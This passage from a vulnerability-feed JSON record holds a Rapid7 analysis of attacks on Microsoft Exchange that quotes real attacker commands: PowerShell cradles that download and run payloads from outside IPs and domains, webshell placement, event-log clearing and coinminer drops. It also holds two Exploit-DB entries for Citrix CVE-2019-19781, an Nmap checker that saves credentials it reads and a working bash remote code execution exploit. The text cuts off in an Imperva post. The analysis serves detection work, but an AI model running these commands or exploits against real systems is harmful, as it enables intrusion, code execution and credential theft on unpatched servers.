functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. The would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the webshell to be marked as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/ /zfwqn \nURL | http://&lt;REDACTED_HOSTNAME&gt;/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-03-23T14:04:36", "published": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2020-01-16T11:26:41", "description": "", "published": "2020-01-16T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EDB-ID:47930", "href": "https://www.exploit-db.com/exploits/47930", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# Date: 2019-12-17\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47930"}, {"lastseen": "2020-01-11T01:26:19", "description": "", "published": "2020-01-11T00:00:00", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EDB-ID:47901", "href": "https://www.exploit-db.com/exploits/47901", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47901"}], "impervablog": [{"lastseen": "2020-01-19T15:26:21", "bulletinFamily": "blog", "cvelist": ["CVE-2019-19781"], "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the 